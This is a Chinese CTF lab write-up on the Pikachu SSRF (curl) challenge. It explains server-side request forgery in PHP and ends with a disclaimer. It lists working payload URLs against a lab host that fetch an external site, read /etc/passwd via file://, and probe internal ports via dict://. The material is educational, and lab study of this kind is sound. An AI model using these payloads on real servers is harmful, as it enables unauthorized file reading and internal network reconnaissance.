当前位置: 首页 > news >正文

【CTF Web】Pikachu SSRF(curl) Writeup(SSRF+读取文件+探测端口)

SSRF(Server-Side Request Forgery:服务器端请求伪造)

其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制

导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据

数据流:攻击者----->服务器---->目标地址

根据后台使用的函数的不同,对应的影响和利用方法又有不一样
PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()

如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。

你可以根据"SSRF"里面的项目来搞懂问题的原因

提示

先了解一下php中curl相关函数的用法吧


原理

curl

PHP的cURL函数是一组用于与URL进行通信的函数。它允许你发送HTTP请求(GET、POST等)并获取响应,还支持各种协议,如HTTP、HTTPS、FTP等。cURL函数非常强大,可以用于访问Web API、抓取网页内容、上传文件等各种网络操作。

解法

审查元素。

<div class="page-content"><a href="ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php">累了吧,来读一首诗吧</a></div>

点击链接。

http://172.17.149.214:8765/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php

访问 URL。

http://172.17.149.214:8765/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

读取文件。

http://172.17.149.214:8765/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd

探测端口。

http://172.17.149.214:8765/vul/ssrf/ssrf_curl.php?url=dict://127.0.0.1:80


声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任


http://www.mrgr.cn/news/50534.html

相关文章:

  • 摸爬滚打半年,我是如何从小白进阶到渗透测试工程师
  • 将已有vs工程部分代码配置成cuda编译
  • Windows设置静态IP地址
  • 元创股份增利不增收:受政策影响较大,大客户沃得农机负作用不小
  • 智慧厂区车辆导航解决方案;智慧工厂电子地图应用解决方案;大型工厂内部导航解决方案;智慧工厂可视化地图应用方案
  • 【Next.js 项目实战系列】00-写在前面
  • python配合yolo分类模型开发分类软件
  • 影刀RPA实战:CSDN博文点赞收藏评论自动化工具
  • 5分钟了解软件开发的20项基本原则
  • PLM产品生命周期管理系统有哪家比较好?三品PLM系统:卓越的产品生命管理解决方案
  • 经纬恒润半主动悬架控制器成功量产
  • Vant 日期时间组件拓展
  • 网络IP地址冲突:含义、影响及应对策略‌
  • yarn error nopt@7.2.1: The engine “node“ is....Expected version “^14.17.0....
  • 【MySQL】VARCHAR和CHAR的区别?
  • PythonAI 学习大纲
  • 云原生介绍
  • 本地部署ComfyUI并添加强大的Flux.1开源文生图模型远程制作AI图片
  • 滑动窗口经典例题
  • <<迷雾>> 第11章 全自动加法计算机(8)--一只开关取数并相加 示例电路